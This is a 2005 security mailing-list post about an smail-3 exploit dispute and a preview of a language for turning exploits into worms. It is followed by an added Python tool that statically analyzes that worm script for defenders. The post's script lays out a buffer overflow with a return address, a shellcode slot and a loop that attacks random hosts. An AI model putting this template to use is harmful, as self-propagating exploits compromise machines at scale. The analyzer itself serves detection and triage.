Dailydave mailing list archives

More stilton, but still pricey.


From: Dave Aitel <dave () immunitysec com>
Date: Sun, 25 Sep 2005 22:08:50 -0400

In case you missed it (as I did) here's Sean pulling an Apache Nosejob on the Greg, author of smail-3.
http://www.weird.com/~woods/projects/smail.html <--original project page
http://archives.neohapsis.com/archives/bugtraq/2005-03/0435.html (sean - you're owned!)
http://archives.neohapsis.com/archives/bugtraq/2005-03/0459.html (greg - no I'm not)
http://archives.neohapsis.com/archives/bugtraq/2005-03/0462.html (sean - yes you are: write4!)
http://archives.neohapsis.com/archives/bugtraq/2005-03/0474.html (sean - here's a sploit!)

Greg takes it in good spirit though, which is good to see.


http://www.cheesesupply.com/ is apparently the place to buy cheese.

Does anyone else type in "Sans Dairy" into the googlebar instead of sans diary a lot? Maybe that's just me. But I'm never dissatisfied with the results!

In any case, here's a preview of the NIL (nematode intermediate language). You can generate this script simply by running ./nematode.py demosploit.py <--or any other exploit.

$ cat out.nem
nops 5000
stroverwrite %27%83%04%08 1036  <--this is just a return address
stroverwrite %CCtheshellcode 1044   <---this is actually a keyword for later
startloop
connect_random_host 5151
sendall
closesock
endloop

Then you can test it with ./neminterpret.py, which is also the launch script once you have compiled the NIL into shellcode with nemx86shellcodegenerator.py. See? Complete cycle. Now all exploits are worms - and worms that you can build on the fly AND control with a level of reliability and trust.

-dave
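The out.nem listing above is compact enough that a defender can reason about it statically: the buffer layout tells you what the bytes on the wire will look like (the basis for a signature), and the loop body tells you whether the script is single-target or self-propagating. The following is an added example written for this archive page; it is not Immunity's nematode code and it does not execute anything. It assumes that NIL uses %XX byte escapes as shown, that text after "<--" is a comment, that the NOP filler byte is x86 0x90 (the post does not say), that "theshellcode" is kept as a literal placeholder, and that connect_random_host inside a loop is a reasonable marker for autonomous spread (a hypothetical classification, not part of NIL). The sample script is the one from the post, embedded inline.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: the out.nem listing from the post, embedded so the
# analyzer runs offline. The "<--" remarks are treated as end-of-line comments.
SAMPLE_NEM = """\
nops 5000
stroverwrite %27%83%04%08 1036  <--this is just a return address
stroverwrite %CCtheshellcode 1044   <---this is actually a keyword for later
startloop
connect_random_host 5151
sendall
closesock
endloop
"""

# Assumption: the filler byte is x86 NOP (0x90); the post does not say which
# byte the generator actually emits.
NOP_BYTE = 0x90

# Hypothetical classification, not part of NIL: an op that picks its own
# target means the script spreads on its own instead of hitting one host.
SELF_TARGETING_OPS = {"connect_random_host"}


@dataclass
class NemReport:
    buffer_len: int = 0
    overwrites: list = field(default_factory=list)  # (offset, payload bytes)
    loop_ops: list = field(default_factory=list)     # ops seen inside startloop/endloop
    ports: set = field(default_factory=set)
    issues: list = field(default_factory=list)


def decode_nil_string(s: str) -> bytes:
    """Decode NIL's %XX byte escapes; everything else is a literal byte.
    Placeholders such as 'theshellcode' stay as their literal text."""
    decoded = re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)
    return decoded.encode("latin-1")


def analyze_nem(text: str) -> NemReport:
    """Walk a NIL script line by line, recording the buffer layout, the loop body,
    and any overwrite that falls outside the buffer or collides with another."""
    rep = NemReport()
    in_loop = False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("<--", 1)[0].strip()   # drop the inline remark
        if not line:
            continue
        op, *args = line.split()
        if op == "nops":
            rep.buffer_len = int(args[0])
        elif op == "stroverwrite":
            data, offset = decode_nil_string(args[0]), int(args[1])
            end = offset + len(data)
            if end > rep.buffer_len:
                rep.issues.append(f"line {lineno}: overwrite {offset}..{end} exceeds buffer of {rep.buffer_len}")
            for other_off, other in rep.overwrites:
                if offset < other_off + len(other) and other_off < end:
                    rep.issues.append(f"line {lineno}: overwrite at {offset} overlaps overwrite at {other_off}")
            rep.overwrites.append((offset, data))
        elif op == "startloop":
            in_loop = True
        elif op == "endloop":
            in_loop = False
        else:
            if in_loop:
                rep.loop_ops.append(op)
            if op == "connect_random_host":
                rep.ports.add(int(args[0]))
    if in_loop:
        rep.issues.append("startloop without matching endloop")
    return rep


def render_buffer(rep: NemReport) -> bytes:
    """Lay the overwrites onto the NOP filler to get the bytes a sensor would see
    on the wire. Overwrites past the end are truncated (already reported as issues)."""
    buf = bytearray([NOP_BYTE]) * rep.buffer_len
    for offset, data in rep.overwrites:
        data = data[:max(0, rep.buffer_len - offset)]
        buf[offset:offset + len(data)] = data
    return bytes(buf)


def classify(rep: NemReport) -> str:
    """'self-propagating' if a self-targeting op runs inside the send loop."""
    return "self-propagating" if SELF_TARGETING_OPS & set(rep.loop_ops) else "single-target"


def main() -> None:
    rep = analyze_nem(SAMPLE_NEM)
    buf = render_buffer(rep)
    print(f"buffer {len(buf)} bytes, {len(rep.overwrites)} overwrites, ports {sorted(rep.ports)}")
    for offset, data in rep.overwrites:
        print(f"  offset {offset}: {data.hex()}")
    print("loop body:", " ".join(rep.loop_ops))
    print("classification:", classify(rep))
    for issue in rep.issues:
        print("issue:", issue)


if __name__ == "__main__":
    main()
```

Run as-is and the report shows a 5000-byte buffer with the return address at offset 1036 and the 0xCC marker plus placeholder at 1044, a loop body of connect_random_host/sendall/closesock on port 5151, and the "self-propagating" classification; the overlap and bounds checks are what you would extend when triaging a script whose offsets were not laid out as cleanly as this one.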
